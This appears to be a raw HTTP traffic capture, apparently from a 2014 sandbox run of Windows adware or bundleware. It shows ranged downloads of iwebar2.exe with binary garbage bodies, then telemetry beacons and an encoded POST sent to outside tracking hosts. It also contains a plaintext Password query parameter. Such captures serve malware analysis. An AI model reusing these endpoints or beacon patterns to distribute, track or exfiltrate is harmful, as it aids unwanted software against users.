    k.*8.y..g.Fr. ;..rS.....)S`.y.!......J".....|]* ...s..!.....^.;.u..L..
    l.%).C~......}../_...1..m..za.<.2d^#..W....?.....].......4Du..8.b..
    ..rY.<....0.^...,.g>........vi.2|.L$.J..A.U.....o.......y.1o....
    ........K.f8..T*.Y1...\........u.l..v..>\....gQ.P{..j...-'.B..?r..r
    .V..k/....=.~.L..L...-..t.&Z})2ll.d...]%X\F.a.....aH..W=M..e.G... .7g.
    .H0...[.ozhYT..i...(W.....~.b.-#....N*tx*.Y.9T.Q..l.z...p...F...t...A.
    .tb........6.|.x._.....f.8.....),...wb..z..ar76K..:`vx.....`;/..M!....
    w>#^r..).T-.....[.cu...Lo.m....C).vu.o.../).r,.cD...1.,... ..w9.~.i
    /......j.b5..Z...0.....op...U..d=.......\?Z...y..#i.h1C.x...3.....

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=2000000-2249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21884
    Content-Range: bytes 2000000-2249999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: qh5QuGMmIZDP3z9qPpoOqTvImuCX7eiuk2I9kLhT7Lg8rMt2nfod5Q==
    Zid....M.u.I.vX..)uS..&5...g.T....D.R.Df5Ad......&......u>_."&...GG
    ......;.%vua..I>.p..S..C..%....\ -M...7.9....3u".LL.`....%...x.. ..
    ..A-.){.....p.....0.....*..{.~H.T57..=:...dN...oz.4b.z]..._.<DP.t.
    #.%......3c.{......k..E.6m...4.....b.w..A...$.P..d.#A.5..BA.Wzh8.(...6
    [email protected]^[email protected]..
    [email protected]@..C..r..3..h[.. .c."9....9.......l$?..Tx..M./^..!.$t.Pq
    ..P...9Dqv.k.......36....[0nH.....a..... .6_H.3.u...^[email protected].\
    W. ..........-.O...I..}d... 3!.6.5..aZ...,.i..(....7..p3.m/o.u#{.g....
    *.X...H.JgMw.iP.;*8.......:.m.........MXzR..s......QW.1..U|."%w..S3oxR
    ....k.Q0d..B..b...........)9..?.N...k.S..!.K.".....Z....,..y.L..b#.. .
    ..........U"lL.M.......LH.....h8.=t.Mw...*h..C...:...t#..n..C........q
    .8..*0e..{;Y...3..Np.....if|<..xB;..g....^._.'l..Tcrm....1.........
    ......OY...W..H.....,...fOS....X.&...R.9.z......<....w....g...o..
    ..........9...'..V....h..c]..lf4.........oh.....Xc5......a..G..T.$...e
    ..'yyM.h2f.).p7:.0xbn..&...7N6.._..#...]..U..B.....U...O.X..*>'.U.@
    ..E...X..u.Xf/.v0lz....._........Ym.s.W....H.S..I..m.;.,9l...s........
    .t..!.....w..D{............K,....... l..M...hz.#...{....R....M.?...k.U
    ([email protected].{...j ..W.C.V.K....P...(,w..w_;[......}.W..h.u....7.A1
    {.;.n.K.^...FI........$.....Q.8`j..k[U...........em.....<........0.
    ..]q.x\..:.P.......Cn:.Y1_..a....l . O.....Q> .@"....n.e).L...f.j..
    .......u..L=.....9.....U......&.4..5.c..<.......O.....Mc..FE.....n.
    ..D9..p.:Y..{#.^h.8I.`xyh.5..ad>c.7...z[!...[i...\..8..........

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=2500000-2749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2500000-2749999/5974736
    Age: 21888
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: DNEqCwUI1jeo9nFAXAm7Hx9SNv_XDo8x6cYInwRJUYn08bZKyEjXJQ==
    ..9.............;.XO....m.........."cj..w.P.F...f.\#{.7..%.j.k.F..f..~
    #........_.......b._...G.7...:}..m.~.....1..R..X..}...i..).}.L.4..8...
    F5x........q.U.....Ns..B.gL._......2..7......t......~...........3..D./
    0ZJ..?..%Z.....v.K...../[email protected]...$.}-..1U..
    ...Z...|...j.._...B.I.2dxX.l2.K=,6..<..t....g......Wd)*...M49.I>
    .....,..*J...1.)0."..h.. 27.G..,3.3zgX....2].|X.E..k.^k.O...Y._..m.[}.
    0sp.h.Q......Yq.E..a.S...yZ....iO.o..D.. .A......))...6...'.Vw.fx..$..
    ....Z..k.^/.e.7.'..........tW.............;..E:.i.Z..../!....l.i..4r..
    ,..*6{.....5y... .a.................]4s..^f..J.f...8k..s.|7......F...%
    .....t.....QK..l.....Fn%..TnjKB.F...9%.b|....K....5l...&..R.Z..&..1...
    .=...s..U..C. Z.K%.......AF...P..`........D.j.a.I.D...G}4......-......
    ..J......@*..............x.. .Y0. ^....=.k....A{[email protected] ....:.
    ...s.|..C..y..l.M.x.sfZ\p..G.du.u`...2.8...P; ..1...:oz.{...?....%.35.
    .4....S..i......#d..FJ.lr.....N..^39y.C..u..B......p..|5.H./1."k..._.;
    z9VM..."...I.H.Q.......DCJ..:....../`....Y.oLS.].pJ....}f........Z....
    .d.@%.=.[@_.r-...;.H..H.[.y..mK...^...g.IL.........O)9........F.6.r$Q)
    a.}Sj.P Dp.<...dLf....K..)[email protected].
    ;...I.;...0....KP..5..Xj.47.C..n..... ...'...^X...*...7...e..........@
    ...H |.E.H]p....;J.{S..Wf..1.Xv....4W.<R%..H..w[....7C........%PH.q
    K...q..V...6....S.ME...aW<...8T....t...9.1.....[.J..E.N...Z.......O
    .......W.$A`>........&."...;.`,.*..C....6.`x......1..|..U`....y..~u
    [....'........9vn}.......n.VFr......(...&U]...W'yg.-....M....]...y

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=3250000-3499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21894
    Content-Range: bytes 3250000-3499999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: dLZ3GcRbLBJwmI5jvzKWcBncRaknMgcasinLzvs0Adu1d3s6hYfh5A==
    [?h...../,.......4&E..M.#...6.........YDj9.s.`&..s....1.;bs...^....1.O
    ..C9E(9.......'V).wF.)lR#9.1hD.6B...~....'.Y...qy.3........o1H........
    [email protected]%e.\..),..~~............._.e .M......T.q...[.SH0
    .).U..K.....R.........=..wZhey...n...DfA..W...Z..x..e.)..TD..{U]@<_
    .}..$..f../...l....;....Yfc.Z*0V.y...........'..jxk..U.a>.x%.....*A
    ..K...9.h..\7;...5...>.3|...XK.D.........{.b3.2..._.....(..D..&'...
    T..z.=..-..z.......%........I.....9.._C........N..c..o......hVd_.5z.,.
    .J".5..../4..f..q...S.9.}Q./e..[........U...A....4...V...$a..^...AM:r.
    . `[email protected]....%..?Q.".)...g_:... .z.9.;.&S^F..)......e.=..
    .!.x<.L.O....!x_...M.{...z........fv..-.W.#.k$...g.6lB...M...y<7
    W..w..j.*... ?..en.N5.p:.w6U.W....ZHX..w.C%.:(wvm.{..\....s/.)..Z....~
    .........r8A-..-..o.../..e..`...%y.$..f*[email protected](z....d
    .L.>...^y...{......m..'1n.O.z..*.W.Eu..&.:..Gs......{.u.#4a. ..DEZY
    .....'..k...^8.y...%....a......Wg3B.n....!.m......vj.......Z.f...Z2./.
    F^pv.......H3..eI.V.....e=....R....7 ........L.C.....E.......p.v.. V..
    ...{.V...........}..?.......8......4~o..kU......Z/........E.....l'...,
    .....=..T`6C......]..?{u...u{~).44 e|QHV.`.j..1..T........P`.a.7..47..
    fF-0..&.P....^1.....D.CLG...W..i.}..{,.......E|.1R.y<!....[...?>
    Q.......ve.Pe.:*....S.dR..........'TE.s.p.X.^.....F.B..Z...a..T.......
    .............WM....B.Q......g.wk......%...*2...a..YN..>.0p.e/....F.
    ..........G*Z-....?.)I......q.O...I.g...=...qVA^..Gb..B....8...U.) .D{
    -...-..._.....?.-.p..%.{#.20...o.qz.o.....m.....aKVP...P...R..]O.:

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=3750000-3999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3750000-3999999/5974736
    Age: 21897
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 09NC1FhexmVJ8agMKlyf74sgiEHeQ5EFVLGhGxm7zGFheQvd4Kkcig==
    .&.p....s!....\..S.0.M.".DW.....;{..R...Bd...m.......C............./..
    C.k.h..L.3rU.. LY.#....0..........=V....,....G....=S..HH:Cz.22 .B...3c
    ?Dm.|.....qA|@...O...m..Z/.06Z...."1...h......m.Q.wP.j./=;)H..t...Y'..
    ...LBB.| .x,5...'.Td.v.&....l\d4.n.......l..5.....%....<..OT...q{.N
    ..{..H..f.[...5......DZi'..0&e>..o<O.mz.....j_.g..5.!.3..f...>
    ;...._..W.%$......<7..&.X ....W1..(P(8..a..]...bH5....{......`..A..
    ....x.Dv...}[email protected].:t.R...*...^S....K..*........G.....u.$`.X......S.
    C..............?......ej... ..#8......?.x........^.:.$h^...k.&....,...
    6.......'.7....&._....ii.;.Z.U.^a.....-O...{...K.v.6.....L#........f.=
    .E..Yp..fJ.yor.....QP.......R9...4....j....._..#^..V8.Q.]J..&.2.x.....
    ........I.Cm..vw.L...(......0.[...$o.$.Q......A....lW.'.Jy.X..?7...;[.
    j0....T:.x..Vn-.f..A9.`ix..D..g.s\:.E...ZV.....F....... ..-......ho_^.
    C.Y15l..Y}.-..ZV.YO2<.!q.x...u....kZ$..gzc\.Q.qo...Ro..9...... uCVT
    ..._-..`.........Qa.!`.Z..F...6.>......%...i.-.y..$e8O..` }.......d
    h..~.0...s..@#-.....0kV:.l..O.P....};.......n.}....=c.?~,p..&..W..W]..
    %....4. %....,.E&.o......r.o.S0....!|...a....f`...............W...D.:.
    .....Os.gu....).m.$.....e1u....B=IG.W..<......*..1....t...k..j..E..
    }}..........0}.....C........y....T.Y;..|.%.Z.=.b..=..i'..a,...c C..*&*
    .:Y62.....V)....u.'....5....J.pW7...2.Q..j ...Z8bXU.......aq8..'....m.
    .;[email protected]..>.n:."..Kd........mXS.5&
    gt;.w...:79.0l.....Y..6.yF........eryl.bu...j.|Y_.'c.j.l...:..v^..\.G.
    nF_.(*.s...E.|...Y.F.....R'=.].0.,..x..L`yn.....?..iW.....$7..hB.6

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=4250000-4499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21899
    Content-Range: bytes 4250000-4499999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: ZLNRmbfC4s9Q7dbMuT0i7F30IxG7X7CnTw1FMkled6UC-BQtfKOw1w==
    ..E..#y..EF. ]...L...6..........8.I..F..y.9...FF....x....J....P|..s.B.
    ]h..dr."-...t.V.7.....N|..R..Q.)b............-y.CS3...8C\.D.g..u......
    .... ..`.....~w.|.N..p.9..>d...)!.......&..X.....zG_......=.1Z.2,..
    ...z......AD4....&....=....a#..x.@..>......K..L....W...J."....b..j.
    I...7......9'.AO.......m......_tp.u.......S...f..aH.j..'.......)|14...
    .U.....8.L.(.._.w.I.z. .4l_..z..........|.....".Y.......k.P..{[email protected].
    FW.h1.#"S..B.VPq...Hd.....%..{.x...KZ[..HX...X.........(....Zk..hn0..:
    [.9x9..El.J.R..K.... ..O.Y ...Y..$.1.:`.)....7L....Cs*..`.X ya.%......
    ...D%bk...5[.\.....,h....X"....i.../V.h....`7mu.*.,.M..OA..A.....U....
    ...S...WK.}..a1.m.\.%...u.. .3..r-.u..mz1.Z....}.R;....SR.V.~L.z2.....
    /.........p....:M.Y.!.N..}~...$........K..8..tp.....h/f.t'7e.?....U..M
    .!...{l.$`...m...j....^~.4.t.............zi;.......w*.]oR. .1.AF.H.%.w
    ..../.W..J........4.k.8..I8.O.....^..r.uJi...M..JzU..vE...R^..b.}..HP.
    R........b......!yw..'.$Q..7.....~....s.....|.Y..6..Rvj.u/F..D..:.....
    &.$pI...h......U..6.).V~.L........zOp.ef.y..H..'9....J....r;.1......Z.
    .d.........d!.n.....n.b-.. `.~.osy..O.3..4....-6x.....iK.\7..w.8.L...[
    .v i...$....R.B.wWM_2...F4M....I]N.....a.....l1.iW....P...Uy..E.`re..Q
    Q..v|7.H..".-..r..S...?[%..}.`..H?]t.i.Z.A..... l..RV....ru2"...#.)l..
    |C..K.....h':..k_..z..6.C.....T&Z....n.nSo]>...g;L.h...]..H|.4.~.%.
    ....'y@.........;F.....0....w.g..'..........68..=N........w...3R......
    G.......N.7.L..i...u...E....B!c.>= J.n...#^5...X....6Cw...G......V.
    |aay....*...b...W.S........o.Z.\...t...... P..(..}M..!X........eA.

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=4750000-4999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4750000-4999999/5974736
    Age: 21901
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Ys9xi3-lVf_fq2JswV2Vbg5XBg6y456UcNhDN2hSj7ikNGUsmcbPkg==
    .!..-.....^>...>........>i...B0C.C.<................0OF..N
    .=.....KAl~.c...<h_>}[email protected]._"y....B..o...T......2j.j/5.A
    .n..k...A&P.. .).k.eP.....!G...E.v1.Je......../7".xV.*t........[.-q...
    ..'*.H.g.{..>...%.^.s.Q..4s...I...........x..}.*.Yq.IK.k.!..5?..k..
    .2....V....V......#..c.]...X7..}..\...~.l:..|......i...a.O....\... ..]
    *:..8....`...T...s.#(Z.........{.mG...,..-....M-..K.tp..Q....Y.Z&..Dq.
    mFg`z.R_..;.Z.).1.b............p@...*!G.....z.........$...~*w...d.....
    `D.."...5K.J..R...:.pq.M..m.I.....r...V....~T..&"...#j....R='..a9.....
    ...$b.Z....i...X(.....d.c.....]..-.!..b5([email protected](....\.....
    ...b..{B.'..0..:!B.........p.^B.....j...^...../V....r..[..t....q.2g2.D
    F%,...s...m..P...........X...[k...T.P..qE..#X.n...D.Ae..^:j.|O..W...$.
    F..*..%.k...|.p.....Y7C.-...ES..1....S.e.L.../.I..T.......5:.22.......
    t...l....]L.k.S..$i?.6.H......6.RnR...k\8wvFg....A.......#.vV..M`..0.l
    q.1Z....8H.JL$ w aT.. [email protected];.R..m..5v..U.#..V.......h"...T.....
    ...T..l......{.=Mh.1.* 5.g...@..;...`.pS..xP'`.0....Z....|@....I......
    .......W... ....R...Z..?.......m..... ....KoP...t0.........%P.~....,..
    .|...b..w...]..=...^..<@O!.....X.`..JF.>H...s!9.....P..O =.....}
    <..w.e..d>...].....R....j.gV.w...~/e.....).....E(...|.._?C...%[#
    q.(..w.Pa....C...ON.7...l8y....$.?)....7......*..M.<._...........y.
    ........F$J.]..Gj.`y....L.....t..[.G.........).i.8,.(c....}..fa.%.{R.l
    . ].(S$.....uE...CO......,.GE.n.....P(Nl.P.g.L.q...0."R....h...HR.*..r
    [email protected].@8.^....(.Q....O.|.....L(.S\...&..z...[.(.?V=

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=5250000-5499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5250000-5499999/5974736
    Age: 21904
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: A7YB0tNPe_HmzV_GxxRJPAV6RnE2vY2SFu693m809xNansEj24Sh6A==
    .....i.......p`.1.r7.....4.aFz..!.fW._,..|v.Z.!..].ic.9.?.!y6........{
    e.7... .H9..4f1...&..n...cF...Tf.3>2..a.2U...Y......V...3....(:.;gl
    J..u:..h....n.....-........M.u;.f.V...<..... ..0.1Nx.....X.w..b..d.
    '.....;..@{......h-..<.Vy.6b....136.x..#.:O:.........e.....k\.{..X.
    R.p..).;.L\.q...\.}..w.Kh..qP.%....^..........1......*..a5..%.........
    [email protected].#./.......,../.$..rQv...s....L..0..BlL8G.
    .A......h....l..'...1&...~.u.......bZ.2...h{..P.ARU..'...L.......gR...
    ....B.=..v.Z.. >.......'l.`......._eur.wYu.D.K_....De....1..`)cV..
    {$\t}.0-..._{.....B/B.....FP*H..7?.B.........{.....!_v\`.~o..FJ.K.....
    M-?............F........F........o.......'j-..H8..;...{.u.Z.lM. ".>
    ....|.$8 .c...|3H.Zl..........}(...!E............a.l.\... \.Y<."8c.
    .1.d..HN*.b9...{....go...w.6..Dh*...?...s....2......X...rItC..|. .j...
    ........R.y1...Ul9.b.o.t......R.wi"_.88.=. ..0;.....M.'.'.D.M..5xJ.e..
    ....k.G.Y..P. E.R....PG....p.l...)i...R.It ..W..........B...Y.`#......
    U..99^........1o........&^m....6.[8..._.^....F..!.y..p%.uQ0..%c....._.
    .....q...b....l..2.._.v<..?...p5Ri%..`.jD...._l. A..I..R..;.......m
    .T=..&.. ...b.U.<...C...*k.s_.JU...|l.....b?.........uR..G....."{..
    .NJV...v.N'M..)./......N"..O..Y.m.f...){..r...*^:....k....^.c,........
    ...iCK..C"..9.NX.x.a..(.F_.6WGw..X..X_..F.zB.O....2,N.'........{......
    ..V..M.e_e5j..o0..U.....2.B4...O_[...5u.{.sG.3.Lb.......@./.\.........
    /... .c.....S....0!......'.K...L......w9.j..L>}@.c.Q..1..(r2..*\...
    .r......&..?.H!e ...2.............`.....=...|...(..m...Bt.\y.....k

    <<< skipped >>>

    GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1 HTTP/1.0
    User-Agent: CoreWinInet
    Host: online.speedbit.com
    Pragma: no-cache


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 44
    Content-Type: text/html; charset=utf-8
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Set-Cookie: ASP.NET_SessionId=xnef5hz1iwahs245uyq0rkiy; path=/; HttpOnly
    Date: Wed, 04 Jun 2014 18:55:31 GMT
    Connection: close
    <RESULT>.<LASTERROR>0</LASTERROR>.</RESULT>...


    GET /apps.gif?action=update&app=32850&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908094&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000046&subid=0&zdata=0&appver=200&bgver=1&pluginsver=164&curtime=1401908122&lifetime=28&oldappver=197&oldbgver=1&oldpluginsver=161&rnd=9805 HTTP/1.1
    Accept: */*
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2:  wzAvjxPde3rYzSjTDjaOj 2d3aWYzAXRZQ8RwgiWCGFctKpKdCT792r8vah/ZPKey1a1242G 0=
    x-amz-request-id: 3D8685C6AA541C4A
    Date: Wed, 04 Jun 2014 18:55:27 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    POST /br.ashx?pid=%s&aid=%s&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=30bd13dc44da9e3ff75fb2ebf299b42f&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
    Host: searchsh.goobzo.com
    Content-Length: 2514
    Connection: Keep-Alive
    Pragma: no-cache

    d=noFdkXddP3gi7XcoTFLBN15zmA7lYbp7xUM/vSD6F0VBeVHdWRTByZJXq3sWt XThlcnJJyP6ltV6qQG9EjLw9BYc63hq/wczKeniDUG3rz7O G7mtHYZOVAye KL rYDr7LC/2HaCuBoXnVzMMjXgEjSuz sXrcCfeoNaIP  ZG5HkGQDpY0voe1EE5aLEjOVSCCGR2Bh6KDgI0j6d1hYAnqm9waRO8bLTgLNAC2fmN1o1ywaeQ0mzvgxhptSaEhYphMMa1LAObG/i3mqbkmrYD0OYU8LfPUSkKlosWCXccNylGRT n5U3IWuBGpiBUMWMCdHXepsJJd9ki886r7RBwoKx9hnfPCSGcO9mdh/wu7bQlbRlB2Ic3nLABPHOHLkYYxCL8DT9Y0XDmP3YaU0cibmNQdVkWtZRezacP7ut yrZcuAS4/0k9Bj8GhfloWfmwAHlZXOFNr749V0RUKrz7RwbbedtZmUydYn8n6i1VS9uC/sOamJUldnCtBUy aAzn5jFhSHb33YCyDvUtHKLBQJY0iJve iIM6vTdEXkt98j h5AddztVKiMzMvdxyKqKQdNZ8po7IiDwx9PHnuiyqh6LJ q7Ncxnud6n9EM9w5eLMgpqZKuwPCxaX4Fy7FT1jnj5gJKbfdfDCpuRpnumgCCUE80o9WxrUgTXiiz8E8pJrc8eTqN6JSP1PQDjysIq4DFIi78rn9rr5/PaqsUSzfrs92ZABnzUa6H0YoFCGy7W90PQb6RgyfTHY88fiQOU92uH31SWh14GWQUSC0miNjHrboL11tljIdgwrzM631QZNuP4ihnSN7vt qkyG0XkD8jaQBLhSRpsERCFL JAXn2ATgK3uFQrq9Hd6zQQFbPY/iqNheuLUcCzsNH6hyLDwDXnh5Phbxpff0hpOS5cph5/vLR8uANxvu9ZyhPdvhG3NlYLFNuMdAX1SLucePEs/9cdaYs8020kUXHRcTfbbraBmG9ixyzDPYkaIYGCgQvoLhWjStcZgs qGI5nEA3KGdNbVK0cKCiPI1tESUR1c0cLRckjEchrMVFhQc3gtSNrP 6VOWUnwhzAg0CbCbIujc3/
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 0
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:07 GMT
    Connection: keep-alive


    GET /installer_updates/000169/update.json HTTP/1.1
    User-Agent: NSIS_Inetc (Mozilla)
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:02 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1393836280"
    Last-Modified: Mon, 03 Mar 2014 08:44:40 GMT
    Cache-Control: max-age=20188
    Content-Length: 39
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1401908102.dop010.am4.t,1401908102.cds004.am4.c
    {"update_from_version":"NA","url":"NA"}HTTP/1.1 200 OK..Date: Wed, 04 
    Jun 2014 18:55:02 GMT..Keep-Alive: timeout=10, max=100..Connection: Ke
    ep-Alive..Accept-Ranges: bytes..ETag: "1393836280"..Last-Modified: Mon
    , 03 Mar 2014 08:44:40 GMT..Cache-Control: max-age=20188..Content-Leng
    th: 39..Content-Type: text/plain; charset=UTF-8..X-HW: 1401908102.dop0
    10.am4.t,1401908102.cds004.am4.c..{"update_from_version":"NA","url":"N
    A"}..


    GET /stats.gif?action=daily&app=48292&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&ver=1_34_05_12&installtime=1401908103&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000803&campaign=000803&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=55&bgver=1&pluginsver=50&curtime=1401908103&lifetime=0&rnd=8172 HTTP/1.1
    Accept: */*
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: 6VkvEjNHc/8IdIZ6qMucvkhGBLA78jWfvw9MT8dctS6mk98Cmq7I/hNDd HdZ0TcqPM6jmFesGg=
    x-amz-request-id: 5EE50E785543FEC6
    Date: Wed, 04 Jun 2014 18:55:33 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:07 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /ThawteTimestampingCA.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: crl.thawte.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: Apache
    ETag: "b4afc7d74ed1d09414b43a1c8c3ae177:1396042209"
    Last-Modified: Fri, 28 Mar 2014 21:30:09 GMT
    Accept-Ranges: bytes
    Content-Length: 341
    Date: Wed, 04 Jun 2014 18:55:16 GMT
    Connection: keep-alive
    Content-Type: application/pkix-crl
    0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U..
    ..Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U..
    ..Thawte Timestamping CA..140320000000Z..140630235959Z0...*.H.........
    ...(.3..'..g~;...pJa...*B.u..prG.[...K.B...F/....-g....y....>...1..
    ...y...e....[.f.....*.B4..]....Q |...K-.\.~.26......|*...B.:#r.;HTTP/1
    .1 200 OK..Server: Apache..ETag: "b4afc7d74ed1d09414b43a1c8c3ae177:139
    6042209"..Last-Modified: Fri, 28 Mar 2014 21:30:09 GMT..Accept-Ranges:
    bytes..Content-Length: 341..Date: Wed, 04 Jun 2014 18:55:16 GMT..Conn
    ection: keep-alive..Content-Type: application/pkix-crl..0..Q0..0...*.H
    ........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1
    .0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Times
    tamping CA..140320000000Z..140630235959Z0...*.H............(.3..'..g~;
    ...pJa...*B.u..prG.[...K.B...F/....-g....y....>...1.....y...e....[.
    f.....*.B4..]....Q |...K-.\.~.26......|*...B.:#r.;..


